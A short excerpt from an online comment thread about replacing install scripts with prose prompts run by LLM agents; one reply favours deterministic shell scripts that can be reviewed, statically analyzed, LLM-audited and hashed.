(I have my own answer to this but I'd like to hear yours first!)
Install scripts are a simple example that current generation LLMs are more than capable of executing correctly with a reasonably descriptive prompt.
More generally, though, there's something fascinating about the idea that the way you describe a program can _be_ the program that tbh I haven't fully wrapped my head around, but it's not crazy to think that in time more and more software will be exchanged by passing prompts around rather than compiled code.
- What the agent is told to do in prose
- How the agent interprets those instructions with the particular weights/contexts/temperature at the moment.
I’m all for the prose idea, but wouldn’t want to trade determinism for it. Shell scripts can be statically analyzed. And also reviewed. Wouldn’t a better interaction be to use an LLM to audit the shell script, then hash the content?